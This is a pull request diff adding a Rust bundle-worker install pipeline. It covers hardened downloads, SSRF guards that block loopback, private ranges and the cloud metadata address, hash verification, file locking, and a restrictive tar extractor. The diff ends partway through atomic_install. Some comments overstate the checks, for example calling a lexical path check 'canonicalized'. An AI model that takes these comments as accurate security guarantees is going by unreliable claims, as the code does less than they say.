### PR TITLE
feat(iii-worker): add bundle worker install pipeline

### DIFF
--- a/Cargo.lock
+++ b/Cargo.lock
@@ -1932,6 +1932,16 @@ dependencies = [
 ]
 
 [[package]]
+name = "fslock"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04412b8935272e3a9bae6f48c7bfff74c2911f60525404edfdd28e49884c3bfb"
+dependencies = [
+ "libc",
+ "winapi",
+]
+
+[[package]]
 name = "function-macros"
 version = "0.1.0"
 dependencies = [
@@ -2833,7 +2843,9 @@ dependencies = [
  "console 0.16.3",
  "ctrlc",
  "dirs 6.0.0",
+ "filetime",
  "flate2",
+ "fslock",
  "futures",
  "hex",
  "humantime",

--- a/crates/iii-worker/Cargo.toml
+++ b/crates/iii-worker/Cargo.toml
@@ -53,6 +53,13 @@ sha2 = "0.10"
 hex = "0.4"
 flate2 = "1"
 tar = "0.4"
+# Used by the bundle archive cache to update mtime on cache hit so LRU
+# eviction reflects real recency, not initial-write time.
+filetime = "0.2"
+# Cross-process advisory file lock for serializing concurrent
+# `iii worker add <bundle-name>` calls during the extract+rename step.
+# Sync API: callers use tokio::task::spawn_blocking to acquire.
+fslock = "0.2"
 tracing = "0.1"
 tracing-subscriber = { version = "0.3", features = ["fmt", "env-filter"] }
 futures = "0.3"

--- a/crates/iii-worker/src/cli/bundle_download.rs
+++ b/crates/iii-worker/src/cli/bundle_download.rs
@@ -1,0 +1,1879 @@
+// Copyright Motia LLC and/or licensed to Motia LLC under one or more
+// contributor license agreements. Licensed under the Elastic License 2.0;
+// you may not use this file except in compliance with the Elastic License 2.0.
+// This software is patent protected. We welcome discussions - reach out at team@iii.dev
+// See LICENSE and PATENTS files for details.
+
+//! Bundle worker install pipeline.
+//!
+//! A bundle worker is a tar.gz archive that contains a packaged
+//! local-worker directory (an `iii.worker.yaml` manifest plus the
+//! bundled application source). The engine resolves the worker via the
+//! registry, downloads the archive over HTTPS, verifies its SHA-256,
+//! extracts it atomically into `~/.iii/workers-bundle/{name}/`, and
+//! then dispatches it through the existing libkrun rails used by
+//! local-path workers.
+//!
+//! Boundary versus the OCI extract path:
+//! - `worker_manager::oci::extract_layer_with_limits` is sized for OCI
+//!   layers (up to 10 GiB / 1 M entries) and does NOT explicitly reject
+//!   symlink/hardlink entries. Bundle workers are publish-time-built
+//!   single-binary artifacts; nothing legitimate inside one is a
+//!   symlink. We therefore use a dedicated, tighter extractor that
+//!   accepts only `Regular` and `Directory` tar entry types and caps
+//!   archive size, file count, and path depth aggressively. See
+//!   `extract_bundle_safely` for the policy.
+//!
+//! Atomicity model:
+//! - All work happens inside `~/.iii/workers-bundle/.staging/<rand>/`.
+//! - A `StagingGuard` holds the fslock for `<name>` and owns the staging
+//!   directory. The guard's `Drop` impl removes the staging directory
+//!   unless `commit()` has been called. The lock outlives the staging
+//!   directory (LIFO drop order), preventing a sibling install from
+//!   slipping into a partially-cleaned-up state.
+//! - The final step is an atomic `std::fs::rename` from the staging dir
+//!   to `~/.iii/workers-bundle/{name}/`. Cross-filesystem renames fall
+//!   back to copy-then-delete.
+//!
+//! Process-restart safety:
+//! - The `Drop` guard cannot run if the process is killed mid-install.
+//! - `sweep_orphans()` runs at engine/CLI startup and removes any
+//!   leftover staging directories. See T18.
+
+use std::path::{Path, PathBuf};
+use std::sync::LazyLock;
+
+use crate::core::error::WorkerOpError;
+
+/// Maximum total uncompressed size of a bundle archive, in bytes.
+///
+/// Bundle workers are bundled-JS / packaged-Python / single-binary
+/// artifacts. 64 MiB covers the realistic upper bound (large JS bundles
+/// with embedded assets) without inheriting the OCI extractor's 10 GiB
+/// ceiling, which would let a malicious or buggy publish exhaust host
+/// disk before validation can run.
+pub const MAX_BUNDLE_TOTAL: u64 = 64 * 1024 * 1024;
+
+/// Maximum size of any single file inside a bundle archive.
+pub const MAX_BUNDLE_FILE: u64 = 32 * 1024 * 1024;
+
+/// Maximum number of tar entries (files + directories) per archive.
+pub const MAX_BUNDLE_ENTRIES: u64 = 1024;
+
+/// Maximum directory depth allowed inside the archive.
+pub const MAX_BUNDLE_DEPTH: usize = 16;
+
+/// Maximum size of the `iii.worker.yaml` manifest (64 KiB).
+///
+/// This is tighter than `MAX_BUNDLE_FILE` because the manifest is parsed
+/// in-process by `serde_yaml`, which (as of 0.9.x, libyaml-based) does
+/// not gate exponential anchor/alias expansion. A small YAML file with
+/// chained aliases can balloon to gigabytes of in-memory `Value`. A
+/// 64 KiB cap means even a worst-case expansion stays under a few MiB.
+pub const MAX_BUNDLE_MANIFEST_BYTES: u64 = 64 * 1024;
+
+/// Environment variable that explicitly enables the loopback SSRF bypass
+/// for local development (e.g. running a Python `http.server` fixture in
+/// place of the registry CDN). Mirrors the OCI `III_INSECURE_REGISTRIES`
+/// gating: production builds reject `http://localhost/...` / `127.0.0.1`
+/// archive URLs by default; operators who need the bypass set
+/// `III_BUNDLE_DEV_LOOPBACK=1` and accept the per-install warning.
+pub const ENV_BUNDLE_DEV_LOOPBACK: &str = "III_BUNDLE_DEV_LOOPBACK";
+
+/// Environment variable that disables the bundle worker install/start
+/// pipeline entirely. Operators who don't trust the registry CDN can
+/// set `III_BUNDLE_WORKERS_DISABLED=1` to refuse every bundle worker
+/// install and start attempt.
+pub const ENV_BUNDLE_WORKERS_DISABLED: &str = "III_BUNDLE_WORKERS_DISABLED";
+
+/// Returns true when the operator has disabled bundle workers via the
+/// `III_BUNDLE_WORKERS_DISABLED=1` environment variable. CLI install
+/// (`handle_bundle_add`) and engine start (`start_bundle_worker`) both
+/// check this gate before doing any network or filesystem work.
+pub fn bundle_workers_disabled() -> bool {
+    std::env::var(ENV_BUNDLE_WORKERS_DISABLED).ok().as_deref() == Some("1")
+}
+
+/// Returns true when the loopback SSRF bypass should fire for
+/// `archive_url`. Requires BOTH the env-var gate AND the URL pointing
+/// at a literal loopback host. Production builds never satisfy the env
+/// var, so the bypass is unreachable there.
+pub fn loopback_dev_bypass_enabled(archive_url: &str) -> bool {
+    let env_set = std::env::var(ENV_BUNDLE_DEV_LOOPBACK).ok().as_deref() == Some("1");
+    env_set && is_loopback_dev_archive_url(archive_url)
+}
+
+/// Shared HTTP client for bundle archive downloads. Differs from the
+/// registry's `HTTP_CLIENT` (which uses the default reqwest redirect
+/// policy of up to 10 hops) in two ways:
+///
+/// 1. **Per-hop SSRF validation.** Every `Location:` header is re-run
+///    through `validate_archive_url_for_ssrf` so a public CDN URL
+///    cannot redirect into a non-routable target (loopback, RFC-1918,
+///    IMDS, etc.). The initial-URL-only check on `validate_archive_url_for_ssrf`
+///    by itself is bypassed by the default redirect-following client.
+///    Mirrors the no-redirect posture of `binary_download::NO_REDIRECT_HTTP_CLIENT`.
+/// 2. **Hop cap of 5.** A legitimate pre-signed CDN URL needs zero
+///    redirects in the common case (S3, Cloudflare R2, GCS sign URLs
+///    resolve to the asset directly). Five hops covers the rare CDN
+///    chain without leaving room for a redirect bomb.
+static BUNDLE_HTTP_CLIENT: LazyLock<reqwest::Client> = LazyLock::new(|| {
+    reqwest::Client::builder()
+        .timeout(std::time::Duration::from_secs(120))
+        .redirect(reqwest::redirect::Policy::custom(|attempt| {
+            // Copy the URL out so the borrow on `attempt.url()` is
+            // released before any consuming method (`error` / `follow`).
+            let target = attempt.url().as_str().to_owned();
+            // The dev-loopback bypass is intentionally NOT honored for
+            // redirects: a public CDN URL must never redirect into
+            // localhost, regardless of operator opt-in. The bypass is
+            // for direct-to-localhost fetches only.
+            if super::download::validate_archive_url_for_ssrf(&target).is_err() {
+                return attempt.error(format!(
+                    "redirect to non-routable target refused by SSRF guard: {target}"
+                ));
+            }
+            if attempt.previous().len() >= 5 {
+                return attempt.error("bundle download exceeded 5 redirects");
+            }
+            attempt.follow()
+        }))
+        .build()
+        .expect("Failed to create bundle HTTP client")
+});
+
+/// Recomputes the SHA-256 of `archive_path` and compares it (case-
+/// insensitively) against `expected_sha256_hex`. Used to close the
+/// TOCTOU window between `lookup_cached_archive` (which hashes the
+/// cache file, then closes it) and `download_archive`'s subsequent
+/// `std::fs::copy` (which re-opens the same path by name). Without
+/// this re-check, a sibling process that swaps the cache bytes
+/// between the two opens can plant arbitrary content under the
+/// expected digest.
+fn verify_archive_sha256(archive_path: &Path, expected_sha256_hex: &str) -> Result<(), String> {
+    use sha2::{Digest, Sha256};
+    use std::io::Read as _;
+    let mut file =
+        std::fs::File::open(archive_path).map_err(|e| format!("open archive for verify: {e}"))?;
+    let mut hasher = Sha256::new();
+    let mut buf = [0u8; 64 * 1024];
+    loop {
+        let n = file
+            .read(&mut buf)
+            .map_err(|e| format!("read archive for verify: {e}"))?;
+        if n == 0 {
+            break;
+        }
+        hasher.update(&buf[..n]);
+    }
+    let actual = format!("{:x}", hasher.finalize());
+    if actual.eq_ignore_ascii_case(expected_sha256_hex.trim()) {
+        Ok(())
+    } else {
+        Err(format!(
+            "sha256 mismatch: expected {}, got {}",
+            expected_sha256_hex.trim(),
+            actual
+        ))
+    }
+}
+
+/// Returns the per-worker FS-lock directory used to serialize concurrent
+/// `iii worker add <name>` calls.
+pub fn bundle_locks_dir() -> PathBuf {
+    super::config_file::bundle_workers_dir().join(".locks")
+}
+
+/// Returns the staging root where in-flight extracts live.
+pub fn bundle_staging_root() -> PathBuf {
+    super::config_file::bundle_workers_dir().join(".staging")
+}
+
+/// Returns the fslock file path for `name`. Holding this lock excludes
+/// other processes from simultaneous install on the same worker.
+pub fn lock_path_for(name: &str) -> PathBuf {
+    bundle_locks_dir().join(format!("{name}.lock"))
+}
+
+/// RAII guard that owns the install-time state: an exclusive fslock and
+/// a staging directory. On `Drop`, the staging directory is removed
+/// unless `commit()` was called. Rust drops struct fields in
+/// **declaration order** (top to bottom), so the staging dir is removed
+/// FIRST and the lock is released LAST. That ordering closes the race
+/// where a sibling `iii worker add` could acquire the lock and observe
+/// a half-cleaned staging directory.
+pub struct StagingGuard {
+    /// Absolute path of the in-flight extract target. Dropped FIRST so
+    /// the staging directory is removed before the lock is released.
+    staging_dir: PathBuf,
+    /// Set by `commit()` once the atomic rename succeeds.
+    committed: bool,
+    /// Held for the lifetime of this guard. Declared LAST so it drops
+    /// LAST, after `staging_dir`'s cleanup has finished.
+    _lock: fslock::LockFile,
+}
+
+impl StagingGuard {
+    /// Returns the staging directory the caller should write into.
+    pub fn staging_dir(&self) -> &Path {
+        &self.staging_dir
+    }
+
+    /// Marks the install as complete. Drop will leave the staging dir
+    /// intact (caller is expected to have already renamed it to its
+    /// final home).
+    pub fn commit(&mut self) {
+        self.committed = true;
+    }
+}
+
+impl Drop for StagingGuard {
+    fn drop(&mut self) {
+        if !self.committed && self.staging_dir.exists() {
+            // Best-effort cleanup. Errors are non-fatal here:
+            // sweep_orphans() at startup is the safety net.
+            let _ = std::fs::remove_dir_all(&self.staging_dir);
+        }
+    }
+}
+
+/// Acquires the per-worker fslock and creates a fresh staging directory.
+///
+/// The lock is acquired via `tokio::task::spawn_blocking` so the async
+/// runtime is not blocked on a syscall. The staging directory name is
+/// unique per call (timestamp + counter) to allow safe interleaving in
+/// the rare case of crash-then-retry.
+pub async fn acquire_staging(name: &str) -> Result<StagingGuard, WorkerOpError> {
+    super::registry::validate_worker_name(name).map_err(|reason| WorkerOpError::InvalidName {
+        name: name.to_string(),
+        reason,
+    })?;
+
+    let locks_dir = bundle_locks_dir();
+    let staging_root = bundle_staging_root();
+    std::fs::create_dir_all(&locks_dir).map_err(|source| WorkerOpError::ConfigIo {
+        path: locks_dir.clone(),
+        source,
+    })?;
+    std::fs::create_dir_all(&staging_root).map_err(|source| WorkerOpError::ConfigIo {
+        path: staging_root.clone(),
+        source,
+    })?;
+
+    let lock_path = lock_path_for(name);
+    let name_for_lock = name.to_string();
+    let lock = tokio::task::spawn_blocking(move || -> Result<fslock::LockFile, WorkerOpError> {
+        let mut lock =
+            fslock::LockFile::open(&lock_path).map_err(|source| WorkerOpError::LockIo {
+                path: lock_path.clone(),
+                source,
+            })?;
+        // Blocking acquire: a parallel `iii worker add foo` from
+        // another shell must wait for this install to finish, then see
+        // AlreadyCurrent on its retry — not immediately error with
+        // W111. The whole closure already runs inside spawn_blocking,
+        // so blocking syscalls are fine. The blocking call returns
+        // when the previous holder exits (graceful or crash); fslock
+        // releases on process death so a hung holder eventually clears.
+        let _ = name_for_lock;
+        lock.lock_with_pid()
+            .map_err(|source| WorkerOpError::LockIo {
+                path: lock_path.clone(),
+                source,
+            })?;
+        Ok(lock)
+    })
+    .await
+    .map_err(|join_err| WorkerOpError::Internal {
+        message: format!("staging lock task panicked: {join_err}"),
+    })??;
+
+    let staging_dir = staging_root.join(unique_staging_dir_name(name));
+    std::fs::create_dir_all(&staging_dir).map_err(|source| WorkerOpError::ConfigIo {
+        path: staging_dir.clone(),
+        source,
+    })?;
+
+    Ok(StagingGuard {
+        _lock: lock,
+        staging_dir,
+        committed: false,
+    })
+}
+
+fn unique_staging_dir_name(name: &str) -> String {
+    use std::sync::atomic::{AtomicU64, Ordering};
+    use std::time::{SystemTime, UNIX_EPOCH};
+    static COUNTER: AtomicU64 = AtomicU64::new(0);
+    let counter = COUNTER.fetch_add(1, Ordering::Relaxed);
+    let ts = SystemTime::now()
+        .duration_since(UNIX_EPOCH)
+        .map(|d| d.as_nanos())
+        .unwrap_or(0);
+    format!("{name}-{ts}-{counter}")
+}
+
+pub async fn download_archive(
+    archive_url: &str,
+    expected_sha256: &str,
+    staging_dir: &Path,
+) -> Result<PathBuf, WorkerOpError> {
+    let safe_url = super::download::sanitize_url_for_logs(archive_url);
+    let started_at = std::time::Instant::now();
+    let archive_path = staging_dir.join(".archive.tar.gz");
+
+    // SSRF guard: refuse plain HTTP, file:, ftp:, and literal IP hosts
+    // that fall in non-routable / link-local / private ranges (e.g.
+    // 169.254.169.254 cloud-IMDS, 10/8 RFC-1918). Done BEFORE the cache
+    // fast-path so a hostile URL never even touches local fs lookup;
+    // see download.rs::validate_archive_url_for_ssrf for the policy.
+    //
+    // Dev escape hatch: `localhost` / `127.0.0.1` (and `::1`) bypass
+    // the guard ONLY when the operator sets `III_BUNDLE_DEV_LOOPBACK=1`.
+    // This mirrors the OCI `III_INSECURE_REGISTRIES` gating — production
+    // builds without the env var refuse loopback URLs. A warning is
+    // printed on every install so a forgotten env path can't silently
+    // enable LAN MITM. See tmp/bundle-worker-test/e2e/serve.py for the
+    // intended fixture server (driven by tmp/bundle-worker-test/e2e/run-e2e.sh).
+    //
+    // Redirect SSRF: the dedicated BUNDLE_HTTP_CLIENT re-runs the SSRF
+    // guard on every `Location:` header so a public-hostname URL cannot
+    // redirect into a non-routable target. The dev bypass is NOT
+    // honored for redirects — only for direct-to-localhost fetches.
+    if loopback_dev_bypass_enabled(archive_url) {
+        use colored::Colorize as _;
+        eprintln!(
+            "  {} bundle archive is served from localhost (III_BUNDLE_DEV_LOOPBACK=1) — \
+             SSRF guard bypassed for {}. Local-dev only; production installs must \
+             use HTTPS CDN URLs.",
+            "warning:".yellow(),
+            safe_url,
+        );
+        tracing::warn!(
+            bundle.archive_url = %safe_url,
+            "bundle.download.ssrf_dev_bypass"
+        );
+    } else if is_loopback_dev_archive_url(archive_url) {
+        // Loopback URL without the env-var opt-in: refuse explicitly so
+        // the operator gets a clear error instead of a confusing
+        // "DisallowedHost: 127.0.0.1" from the generic SSRF guard.
+        tracing::warn!(
+            bundle.archive_url = %safe_url,
+            "bundle.download.loopback_without_env_gate"
+        );
+        return Err(WorkerOpError::Download {
+            url: safe_url.clone(),
+            source: std::io::Error::other(format!(
+                "loopback archive URL refused without {ENV_BUNDLE_DEV_LOOPBACK}=1"
+            )),
+        });
+    } else if let Err(e) = super::download::validate_archive_url_for_ssrf(archive_url) {
+        tracing::warn!(
+            bundle.archive_url = %safe_url,
+            error = %e,
+            "bundle.download.ssrf_guard_rejected"
+        );
+        return Err(WorkerOpError::Download {
+            url: safe_url.clone(),
+            source: std::io::Error::other(format!("{e}")),
+        });
+    }
+
+    // Cache fast-path. A hit means we already verified this exact blob
+    // in a prior install (or someone primed the cache out-of-band). We
+    // copy into the staging dir and then RE-HASH the copy: the window
+    // between `lookup_cached_archive`'s read (which hashes then closes
+    // the cache file) and this `std::fs::copy` (which re-opens by path)
+    // is a TOCTOU race a sibling process can exploit by swapping the
+    // cache contents (concurrent eviction, manual rm, hostile sibling).
+    // The re-verify closes that window.
+    if let Some(cached) = lookup_cached_archive(expected_sha256) {
+        match std::fs::copy(&cached, &archive_path) {
+            Ok(_) => match verify_archive_sha256(&archive_path, expected_sha256) {
+                Ok(()) => {
+                    tracing::info!(
+                        bundle.archive_url = %safe_url,
+                        bundle.expected_sha256 = %expected_sha256,
+                        cache.source = %cached.display(),
+                        bundle.duration_ms = started_at.elapsed().as_millis() as u64,
+                        "bundle.download.cache_hit"
+                    );
+                    return Ok(archive_path);
+                }
+                Err(reason) => {
+                    // Verified-bad cache copy: the cache content was
+                    // tampered between lookup hash and copy open. Drop
+                    // the corrupt copy, evict the cache entry, and fall
+                    // through to a fresh network fetch.
+                    let _ = std::fs::remove_file(&archive_path);
+                    let _ = std::fs::remove_file(&cached);
+                    tracing::warn!(
+                        bundle.archive_url = %safe_url,
+                        cache.source = %cached.display(),
+                        error = %reason,
+                        "bundle.download.cache_hit_reverify_failed"
+                    );
+                }
+            },
+            Err(e) => {
+                // Treat copy failure as a soft cache miss; fall back to
+                // the network path so an install never hard-fails on a
+                // local fs hiccup.
+                tracing::warn!(
+                    bundle.archive_url = %safe_url,
+                    cache.source = %cached.display(),
+                    error = %e,
+                    "bundle.download.cache_copy_failed"
+                );
+            }
+        }
+    }
+
+    tracing::debug!(
+        bundle.archive_url = %safe_url,
+        bundle.expected_sha256 = %expected_sha256,
+        "bundle.download.start"
+    );
+
+    let resp = BUNDLE_HTTP_CLIENT
+        .get(archive_url)
+        .send()
+        .await
+        .map_err(|e| {
+            tracing::warn!(
+                bundle.archive_url = %safe_url,
+                error = %e,
+                "bundle.download.request_failed"
+            );
+            WorkerOpError::Download {
+                url: safe_url.clone(),
+                source: std::io::Error::other(format!("request failed: {e}")),
+            }
+        })?;
+
+    if !resp.status().is_success() {
+        return Err(WorkerOpError::Download {
+            url: safe_url.clone(),
+            source: std::io::Error::other(format!("HTTP {}", resp.status())),
+        });
+    }
+
+    let outcome = super::download::stream_response_to_path(
+        resp,
+        &archive_path,
+        super::download::StreamOptions {
+            max_size: MAX_BUNDLE_TOTAL,
+            allowed_content_type_prefix: Some("application/"),
+            url_for_logs: &safe_url,
+        },
+    )
+    .await
+    .map_err(|e| WorkerOpError::Download {
+        url: safe_url.clone(),
+        source: std::io::Error::other(format!("{e}")),
+    })?;
+
+    let expected_hex = expected_sha256.trim();
+    if !outcome.sha256_hex.eq_ignore_ascii_case(expected_hex) {
+        // Delete the verified-bad blob immediately; do not leave it on
+        // disk for a later install to mistakenly reuse.
+        let _ = std::fs::remove_file(&archive_path);
+        tracing::warn!(
+            bundle.archive_url = %safe_url,
+            bundle.expected_sha256 = %expected_hex,
+            bundle.actual_sha256 = %outcome.sha256_hex,
+            "bundle.download.sha256_mismatch"
+        );
+        return Err(WorkerOpError::Download {
+            url: safe_url.clone(),
+            source: std::io::Error::other(format!(
+                "sha256 mismatch: expected {expected_hex}, got {}",
+                outcome.sha256_hex,
+            )),
+        });
+    }
+
+    // Best-effort cache insert. Failures here never fail the install —
+    // worst case is we re-download next time.
+    if let Err(e) = store_in_cache(&archive_path, &outcome.sha256_hex) {
+        tracing::warn!(
+            bundle.sha256 = %outcome.sha256_hex,
+            error = %e,
+            "bundle.cache.store_failed"
+        );
+    }
+
+    tracing::info!(
+        bundle.archive_url = %safe_url,
+        bundle.bytes = outcome.bytes_written,
+        bundle.duration_ms = started_at.elapsed().as_millis() as u64,
+        "bundle.download.complete"
+    );
+    Ok(archive_path)
+}
+
+/// Returns true when `archive_url`'s host is `localhost`, `127.0.0.1`,
+/// or `::1` — the trio the SSRF guard would otherwise reject.
+///
+/// Used by `download_archive` to allow a developer's local
+/// `http.server` to stand in for the registry CDN during E2E tests.
+/// Mirrors the OCI `localhost`/`127.0.0.1` exemption in
+/// `worker_manager::oci::insecure_registries` but lives here because
+/// the bundle path has its own SSRF guard while OCI does not.
+fn is_loopback_dev_archive_url(archive_url: &str) -> bool {
+    let Ok(url) = reqwest::Url::parse(archive_url) else {
+        return false;
+    };
+    let Some(host) = url.host_str() else {
+        return false;
+    };
+    // Strip brackets that reqwest leaves around IPv6 hosts.
+    let host = host
+        .strip_prefix('[')
+        .and_then(|s| s.strip_suffix(']'))
+        .unwrap_or(host)
+        .to_ascii_lowercase();
+    matches!(host.as_str(), "localhost" | "127.0.0.1" | "::1")
+}
+
+/// Async wrapper around the blocking tar extractor.
+///
+/// Decompression + entry validation are CPU-bound and synchronous;
+/// running them on a tokio worker thread would block other tasks for
+/// the duration (100-300 ms on a 64 MiB archive on a fast host, much
+/// longer on slower disks). Dispatch via `spawn_blocking` so the
+/// runtime stays responsive while the archive is unpacked.
+pub async fn extract_bundle_safely(archive_path: &Path, dest: &Path) -> Result<(), WorkerOpError> {
+    let archive_path = archive_path.to_path_buf();
+    let dest = dest.to_path_buf();
+    tokio::task::spawn_blocking(move || extract_bundle_safely_blocking(&archive_path, &dest))
+        .await
+        .map_err(|join_err| WorkerOpError::Internal {
+            message: format!("bundle extract task panicked: {join_err}"),
+        })?
+}
+
+/// Safely extracts a bundle tar.gz archive into `dest` (synchronous).
+///
+/// Always call via `extract_bundle_safely` from async contexts. Direct
+/// callers must be on a blocking thread (tests, CLI sync entrypoints).
+///
+/// Policy (tighter than the OCI extractor):
+/// - Only `Regular` and `Directory` tar entry types are accepted.
+///   Everything else (`Symlink`, `Link`, `Char`, `Block`, `Fifo`,
+///   `Continuous`, `GNUSparse`, `XGlobalHeader`, ...) is rejected.
+/// - Paths must be relative and must not contain `..` components.
+/// - Absolute paths (anything starting with `/` or `\`) are rejected.
+/// - The total uncompressed size, file count, single-file size, and
+///   path depth are all capped (see `MAX_BUNDLE_*` constants).
+/// - Setuid/setgid bits are stripped from regular files.
+pub fn extract_bundle_safely_blocking(
+    archive_path: &Path,
+    dest: &Path,
+) -> Result<(), WorkerOpError> {
+    use flate2::read::GzDecoder;
+    use std::fs::File;
+    use std::io::Read;
+    use tar::EntryType;
+
+    let file = File::open(archive_path).map_err(|e| WorkerOpError::ConfigIo {
+        path: archive_path.to_path_buf(),
+        source: e,
+    })?;
+    let gz = GzDecoder::new(file);
+    let mut archive = tar::Archive::new(gz);
+
+    // Refuse to follow internal symlinks the tar crate would otherwise
+    // resolve. Belt-and-braces with the entry_type filter below.
+    archive.set_preserve_permissions(true);
+    archive.set_unpack_xattrs(false);
+    archive.set_overwrite(true);
+
+    let mut total_bytes: u64 = 0;
+    let mut entry_count: u64 = 0;
+
+    let entries = archive
+        .entries()
+        .map_err(|e| WorkerOpError::BundleArchiveUnsafe {
+            reason: format!("failed to read tar entries: {e}"),
+            entry: None,
+        })?;
+
+    for entry_result in entries {
+        let mut entry = entry_result.map_err(|e| WorkerOpError::BundleArchiveUnsafe {
+            reason: format!("malformed tar entry: {e}"),
+            entry: None,
+        })?;
+
+        entry_count += 1;
+        if entry_count > MAX_BUNDLE_ENTRIES {
+            return Err(WorkerOpError::BundleArchiveUnsafe {
+                reason: format!("archive has more than {MAX_BUNDLE_ENTRIES} entries"),
+                entry: None,
+            });
+        }
+
+        let entry_type = entry.header().entry_type();
+        if !matches!(entry_type, EntryType::Regular | EntryType::Directory) {
+            // Capture the raw path-bytes representation for the error
+            // message but do not allow the tar lib to write anything.
+            let path_repr = entry
+                .path()
+                .map(|p| p.display().to_string())
+                .unwrap_or_else(|_| "<invalid-utf8>".to_string());
+            return Err(WorkerOpError::BundleArchiveUnsafe {
+                reason: format!(
+                    "rejected tar entry type {entry_type:?}; only Regular and Directory allowed"
+                ),
+                entry: Some(path_repr),
+            });
+        }
+
+        // Validate the path: must be relative, no parent traversals,
+        // bounded depth.
+        let path = entry
+            .path()
+            .map_err(|e| WorkerOpError::BundleArchiveUnsafe {
+                reason: format!("entry has invalid path: {e}"),
+                entry: None,
+            })?;
+
+        let path_str = path.display().to_string();
+        if path.is_absolute() {
+            return Err(WorkerOpError::BundleArchiveUnsafe {
+                reason: "absolute paths are not allowed".to_string(),
+                entry: Some(path_str),
+            });
+        }
+
+        let mut depth = 0usize;
+        for component in path.components() {
+            use std::path::Component;
+            match component {
+                Component::Normal(_) => depth += 1,
+                Component::CurDir => {}
+                Component::ParentDir => {
+                    return Err(WorkerOpError::BundleArchiveUnsafe {
+                        reason: "path contains `..` component".to_string(),
+                        entry: Some(path_str.clone()),
+                    });
+                }
+                Component::RootDir | Component::Prefix(_) => {
+                    return Err(WorkerOpError::BundleArchiveUnsafe {
+                        reason: "path contains absolute/prefix component".to_string(),
+                        entry: Some(path_str.clone()),
+                    });
+                }
+            }
+        }
+        if depth > MAX_BUNDLE_DEPTH {
+            return Err(WorkerOpError::BundleArchiveUnsafe {
+                reason: format!("path depth {depth} exceeds limit {MAX_BUNDLE_DEPTH}"),
+                entry: Some(path_str.clone()),
+            });
+        }
+
+        let size = entry.header().size().unwrap_or(0);
+        if size > MAX_BUNDLE_FILE {
+            return Err(WorkerOpError::BundleArchiveUnsafe {
+                reason: format!(
+                    "single file {:.1} MiB exceeds limit {:.1} MiB",
+                    size as f64 / 1_048_576.0,
+                    MAX_BUNDLE_FILE as f64 / 1_048_576.0,
+                ),
+                entry: Some(path_str.clone()),
+            });
+        }
+        total_bytes = total_bytes.saturating_add(size);
+        if total_bytes > MAX_BUNDLE_TOTAL {
+            return Err(WorkerOpError::BundleArchiveUnsafe {
+                reason: format!(
+                    "uncompressed total exceeds limit {:.1} MiB",
+                    MAX_BUNDLE_TOTAL as f64 / 1_048_576.0,
+                ),
+                entry: Some(path_str.clone()),
+            });
+        }
+
+        let dest_path = dest.join(&path);
+        // Double-check after composition: the canonicalized destination
+        // must remain inside `dest`. This is the final guard against
+        // any path-traversal we missed above (e.g. unicode normalization).
+        match dest_path.strip_prefix(dest) {
+            Ok(_) => {}
+            Err(_) => {
+                return Err(WorkerOpError::BundleArchiveUnsafe {
+                    reason: "resolved path escapes destination root".to_string(),
+                    entry: Some(path_str.clone()),
+                });
+            }
+        }
+
+        match entry_type {
+            EntryType::Directory => {
+                std::fs::create_dir_all(&dest_path).map_err(|source| WorkerOpError::ConfigIo {
+                    path: dest_path.clone(),
+                    source,
+                })?;
+            }
+            EntryType::Regular => {
+                if let Some(parent) = dest_path.parent() {
+                    std::fs::create_dir_all(parent).map_err(|source| WorkerOpError::ConfigIo {
+                        path: parent.to_path_buf(),
+                        source,
+                    })?;
+                }
+                let mut out = std::fs::File::create(&dest_path).map_err(|source| {
+                    WorkerOpError::ConfigIo {
+                        path: dest_path.clone(),
+                        source,
+                    }
+                })?;
+                let mut buf = vec![0u8; 64 * 1024];
+                let mut written: u64 = 0;
+                loop {
+                    let n = entry
+                        .read(&mut buf)
+                        .map_err(|source| WorkerOpError::ConfigIo {
+                            path: dest_path.clone(),
+                            source,
+                        })?;
+                    if n == 0 {
+                        break;
+                    }
+                    written += n as u64;
+                    if written > MAX_BUNDLE_FILE {
+                        return Err(WorkerOpError::BundleArchiveUnsafe {
+                            reason: "file body exceeded MAX_BUNDLE_FILE during read".to_string(),
+                            entry: Some(path_str.clone()),
+                        });
+                    }
+                    use std::io::Write as _;
+                    out.write_all(&buf[..n])
+                        .map_err(|source| WorkerOpError::ConfigIo {
+                            path: dest_path.clone(),
+                            source,
+                        })?;
+                }
+
+                // Apply the tar header mode so vendored executables
+                // keep their +x bit. The mode is masked to 0o0777
+                // first, dropping setuid/setgid/sticky — bundles never
+                // run elevated.
+                #[cfg(unix)]
+                {
+                    use std::os::unix::fs::PermissionsExt as _;
+                    let archive_mode = entry.header().mode().unwrap_or(0o0644);
+                    let safe_mode = archive_mode & 0o0777;
+                    let perms = std::fs::Permissions::from_mode(safe_mode);
+                    let _ = std::fs::set_permissions(&dest_path, perms);
+                    // Old setuid-strip block kept guarded for the case
+                    // where a previous extractor left bits on disk.
+                    if let Ok(metadata) = std::fs::metadata(&dest_path) {
+                        let mut perms = metadata.permissions();
+                        let mode = perms.mode();
+                        let final_mode = mode & 0o0777;
+                        if mode != final_mode {
+                            perms.set_mode(final_mode);
+                            let _ = std::fs::set_permissions(&dest_path, perms);
+                        }
+                    }
+                }
+            }
+            // Already filtered above.
+            _ => unreachable!(),
+        }
+    }
+
+    Ok(())
+}
+
+/// Performs the atomic install step: rename the staging dir into its
+/// final home at `~/.iii/workers-bundle/{name}/`.
+///
+/// Same-filesystem fast path: a single `std::fs::rename` swaps the
+/// staging tree into its final location in O(1).
+///
+/// Cross-filesystem fallback (EXDEV/EBUSY): we copy into a sibling
+/// temp directory `<final_dir>.partial.<unique>` and only then rename
+/// the sibling into `final_dir`. The sibling sits in the same parent
+/// directory as the final dir, which guarantees the rename step is on a
+/// single filesystem and therefore atomic. If any step of the copy
+/// fails, the partial sibling is removed and the original staging dir
+/// is left in place for the StagingGuard to clean — `final_dir` is
+/// never even touched, so a half-installed worker can never appear
+/// under `iii worker list`.
+pub fn atomic_install(staging_dir: &Path, name: &str) -> Result<PathBuf, WorkerOpError> {
+    let final_dir = super::config_file::bundle_worker_path(name);
+    if final_dir.exists() {
+        return Err(WorkerOpError::AlreadyExists {
+            name: name.to_string(),
+        });
+    }
+    if let Some(parent) = final_dir.parent() {
+        std::fs::create_dir_all(parent).map_err(|source| WorkerOpError::ConfigIo {
+            path: parent.to_path_buf(),
+            source,
+        })?;
+    }
+
+    match std::fs::rename(staging_dir, &final_dir) {
+        Ok(()) => Ok(final_dir),
+        Err(e) if cross_device_or_busy(&e) => {
